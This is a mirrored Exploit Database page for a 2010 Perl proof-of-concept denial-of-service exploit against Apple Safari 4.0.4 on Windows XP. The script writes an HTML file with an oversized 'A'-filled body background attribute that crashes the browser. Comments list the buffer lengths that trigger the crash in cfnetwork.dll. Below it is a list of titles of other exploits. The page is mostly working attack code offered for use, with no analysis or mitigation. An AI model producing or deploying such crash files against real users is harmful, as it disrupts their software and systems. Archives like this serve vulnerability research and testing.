Apple Safari 4.0.4 (531.21.10) – Stack Overflow / Denial of Service

Exploit Database
19 阅读

作者： John Cobb

日期： 2010-02-28
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/11601/

#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

$filename = $ARGV[0];
$buffer = $ARGV[1];
if(!defined($filename))
{
print "Usage: $0 <filename.html> <buffer>\n\n";
}

$header = "<html>
<head>" . "\n";
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";
$footer = "</html>" . "\n";

$data = $header . $crash . $footer;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;

last Exploits
Apple Safari 4.0.4 (531.21.10) – Stack Overflow / Denial of Service的更多信息

OpenOffice 3.1 – ‘.slk’ Null Pointer Dereference Remote Denial of Service：
Microsoft Windows Kernel – ‘win32k.sys’ Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)：
SpotAuditor 5.3.2 – ‘Name’ Denial of Service：
FCrackZip 1.0 – Local Buffer Overflow (PoC)：
Microsoft Office SharePoint Server 2016 – Denial of Service (Metasploit)：
Microsoft Edge Chakra JIT – Stack-to-Heap Copy：
Media Player Classic 1.3.1774.0 – mpcpl Local Denial of Service (PoC)：
GNU binutils – ‘disassemble_bytes’ Heap Overflow：